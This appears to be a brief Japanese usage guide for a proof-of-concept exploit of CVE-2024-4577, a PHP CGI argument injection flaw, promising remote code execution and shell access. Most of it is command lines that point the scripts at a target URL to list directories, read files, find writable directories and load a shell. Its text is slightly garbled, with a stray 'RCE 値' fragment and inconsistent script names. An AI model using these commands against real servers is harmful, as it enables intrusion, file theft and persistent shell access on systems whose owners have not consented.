
CVE-2024-4577の概念実証エクスプロイト。PHP CGIの引数インジェクションの脆弱性であり、脆弱なターゲット上でリモートコード実行とシェルアクセスを可能にします。
RCE 値python3 cek.py --target http://target/index.php --ls --dir /path/to/directory
python3 cek.py --target https://target/index.php --dir /path/to/directory
python3 cek.py --target https://target/index.php --cat /path/to/directory
書き込み可能なディレクトリを検索
python3 cek.py --target https://target/index.php --find
シェルをロード
python3 cuk.py --target https://target/index.php